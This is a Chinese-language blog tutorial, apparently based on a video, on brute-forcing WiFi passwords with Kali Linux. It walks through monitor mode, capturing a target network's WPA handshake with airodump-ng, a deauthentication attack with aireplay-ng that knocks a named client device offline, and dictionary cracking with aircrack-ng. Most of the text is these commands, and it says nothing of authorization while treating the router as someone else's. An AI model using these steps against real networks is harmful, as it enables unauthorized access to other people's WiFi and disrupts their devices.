Kali-Brute-Force-Wifi-1

Linux

Kali 暴力破解 Wifi 密码

源视频的博主:鳞零苓

前期准备

  1. Kali 系统需要配置无线网卡驱动,如果 Kali 不支持你的无线网卡,你需要自行找到 kali 系统的 驱动打上去。

  2. 准备一个强力的 密码字典

操作

1、查看你的无线网卡是否启用

1
ifconfig

2、查看网卡是否支持监听功能

1
airmon-ng

3、打卡监听模式

1
airmon-ng start wlan0

4、查看监听网卡名称

1
ifconfig

5、扫描 Wifi 信号

1
airodump-ng wlan0mon

注:
我们以 CMCC-L8TF 为例,我们需要记录两个信息 BSSID 与 CH
BSSID:为 Wifi 的 MAC号
CH:为 Wifi 的频段

6、进行抓包

1
airodump-ng -c 1 --bssid 6C:06:D6:58:83:00 -w /home/kali/桌面/handshake  wlan0mon

注:
-c 后面是 Wifi 的频段
–bssid 后面 是 Wifi 的 MAC 号
-w 后面跟文件路径,即抓包的数据日志

这种抓包方式比较被动,只有等设备完成认证才能抓到握手包

7、使用 ACK 攻击,将设备下线,然后就可以抓到正确的包(第六步的抓包窗口不能关闭)

1
aireplay-ng -0 10 -a 6C:06:D6:58:83:00 -c 9A:66:B7:56:5C:E7 wlan0mon

注:
-0:表示通知设备断开连接
10:表示攻击 10 次
-a:后面跟的是要破解的 Wifi 的 MAC 号
-c:表示要踢下线的设备,就是我们抓包的那个终端显示的 MAC 地址

8、 ACK 攻击完成后,关闭 (第六步)抓包命令

这个时候会在你抓包命令配置的路径生成 5 个文件,需要用的是下面的 Cap 文件

9、暴力破解的过程(使用密码字典)

1
aircrack-ng -w /home/kali/桌面/字典.txt -b 6C:06:D6:58:83:00 /home/kali/桌面/handshake-01.cap

注:
-w:后面跟的是密码字典,
-b:后面跟的是 WIFI 的 MAC 号,
最后跟的是 之前的抓包的 CAP 文件

等待暴力破解,如果字典中有 Wifi 的密码 那么 Wifi 的密码一定可以破解。

10、其他说明

密码破解完成不代表着可以连接,如果对方路由器绑定了 连接设备的 MAC 地址那么就算密码被破解了,也不能连上该 Wifi。

Title:Kali-Brute-Force-Wifi-1

Author:

Created:2022-05-24, 12:55:21

Updated:2022-11-18, 09:11:42

Full URL:http://yoursite.com/2022/05/24/Kali-Brute-Force-Wifi-1/

License: "CC BY-NC-SA 4.0" Keep Link & Author if Distribute.

Contents
  1. 1. Kali 暴力破解 Wifi 密码
    1. 1.1. 前期准备
    2. 1.2. 操作
      1. 1.2.1. 1、查看你的无线网卡是否启用
      2. 1.2.2. 2、查看网卡是否支持监听功能
      3. 1.2.3. 3、打卡监听模式
      4. 1.2.4. 4、查看监听网卡名称
      5. 1.2.5. 5、扫描 Wifi 信号
      6. 1.2.6. 6、进行抓包
      7. 1.2.7. 7、使用 ACK 攻击,将设备下线,然后就可以抓到正确的包(第六步的抓包窗口不能关闭)
      8. 1.2.8. 8、 ACK 攻击完成后,关闭 (第六步)抓包命令
      9. 1.2.9. 9、暴力破解的过程(使用密码字典)
      10. 1.2.10. 10、其他说明
|